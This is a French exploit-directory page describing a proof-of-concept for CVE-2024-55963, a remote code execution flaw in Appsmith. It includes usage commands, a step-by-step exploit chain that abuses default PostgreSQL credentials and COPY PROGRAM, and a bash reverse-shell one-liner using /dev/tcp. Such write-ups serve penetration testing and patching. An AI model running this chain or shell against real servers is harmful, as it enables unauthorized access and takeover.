Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-55963 — CVE-2024-55963 permet l'exécution de code à distance sans authentification sur la plateforme Appsmith Enterprise en raison d'une base de données PostgreSQL mal configurée incluse par défaut. | Kitploit
Outils/GitHubGitHub/superswan/cve-2024-55963
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionMauvaise ConfigurationRed TeamingSécurité des Bases de Données
GitHubsuperswan/cve-2024-55963

CVE-2024-55963

CVE-2024-55963 permet l'exécution de code à distance sans authentification sur la plateforme Appsmith Enterprise en raison d'une base de données PostgreSQL mal configurée incluse par défaut.

212il y a 1 anPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE‑2024‑55963 – PoC RCE pour Appsmith

Exploit PoC pour CVE‑2024‑55963 qui exécute des commandes arbitraires ou génère un reverse shell sur les instances Appsmith vulnérables.

Il gère automatiquement à la fois les serveurs modernes (avec la fonctionnalité environmentId) et les versions « legacy » plus anciennes qui l'ont précédé, vous pouvez donc utiliser un seul script pour toutes les versions de v1.20 jusqu'à la dernière version vulnérable v1.51.


Démarrage rapide

# Run an arbitrary command (default is `id`)
python3 appsmith-rce.py https://target.example.com [email protected] password123 "whoami"

# spawn a reverse shell
python3 appsmith-rce.py https://target.example.com [email protected] password123 -revshell <ip> <port>

Remarque : Tous les identifiants fonctionnent tant que le serveur autorise l'inscription en libre-service. Le script tente d'abord de se connecter et recourt à l'inscription si le compte n'existe pas.


Fonctionnement (haut niveau)

  1. Gestion CSRF et session – récupère le jeton depuis plusieurs points de terminaison possibles ou le cookie jar, puis le transmet.
  2. Flux de connexion/inscription – se connecte ou enregistre un nouvel utilisateur avec l'email / mot de passe fourni.
  3. Découverte de l'espace de travail – récupère un espace de travail existant ou déclenche le flux d'intégration pour en créer un automatiquement.
  4. Détection de l'environnement – interroge /api/v1/environments/workspaces/{id} ; s'il est absent, bascule en mode legacy (environmentId vide).
  5. Configuration de l'application et de la page – envoie une requête POST à /api/v1/applications et extrait pageId.
  6. Création de la source de données – construit une source de données PostgreSQL locale pointant vers localhost:5432 avec les identifiants postgres/postgres (autorisé par le pg_hba.conf par défaut vulnérable).
  7. Objets SQL – télécharge une fonction PL/pgSQL auxiliaire exec_cmd() ainsi qu'une table temporaire cmd_output qui collecte la sortie standard (STDOUT).
  8. Exécution de la commande – exécute SELECT * FROM exec_cmd('<votre commande>') via le point de terminaison /api/v1/actions/execute
  9. Reverse shell (optionnel) – exécute bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

Prérequis

  • Python ≥ 3.8
  • requests

Versions testées

Version d'AppsmithRésultat
1.51✅ RCE
1.45✅ RCE
1.30✅ RCE, chemin legacy
1.52+❌ Patché – échec de création de fonction

Différences avec le PoC de Rhino Security Labs

Ce PoC est une légère amélioration de l'exploit de Rhino Security Labs (je n'avais pas réalisé qu'ils avaient déjà un PoC public lorsque j'examinais leurs recherches)

Le PoC de Rhino utilise des en-têtes, cookies et identifiants statiques. En testant cet exploit, j'ai rencontré des problèmes lorsque le compte existait déjà sur certaines versions. Ce script permet à l'utilisateur de saisir n'importe quelle combinaison email/mot de passe depuis la ligne de commande. Comme mentionné, le jeton CSRF est extrait plutôt que d'utiliser des valeurs codées en dur.

  • Cette version fonctionne sur les serveurs plus anciens qui ne disposent pas du point de terminaison Environments API.
  • Le chemin d'exécution est différent. Celui-ci utilise COPY PROGRAM à l'intérieur du wrapper PL/pgSQL exec_cmd() et l'API /actions/execute, mais c'est sans doute plus bruyant. Rhino s'appuie sur le point de terminaison intégré d'aperçu du schéma pour émettre une instruction COPY (SELECT …) ad‑hoc. Ce point de terminaison tronque la longueur de la sortie et ajoute des règles de citation supplémentaires, ce qui rend plus difficiles le passage de longues commandes ou de charges utiles chaînées.
  • Un seul flag reverse shell (:
  • Randomise les noms d'application/source de données/fonction
  • Pas de dépendance pyfiglet
  • Support des serveurs plus anciens en détectant automatiquement l'en-tête environmentId. L'exploit de Rhino suppose qu'il est toujours présent.

Ensemble, ces choix de conception rendent l'exploit plus court, plus fiable et plus convivial pour une utilisation en équipe rouge tout en démontrant la même vulnérabilité sous-jacente.

Références

rhinosecuritylabs.com


Avertissement légal

Ce code est fourni uniquement à des fins éducatives et de test autorisé. L'exécuter sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est probablement illégal. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.

Télécharger l’outil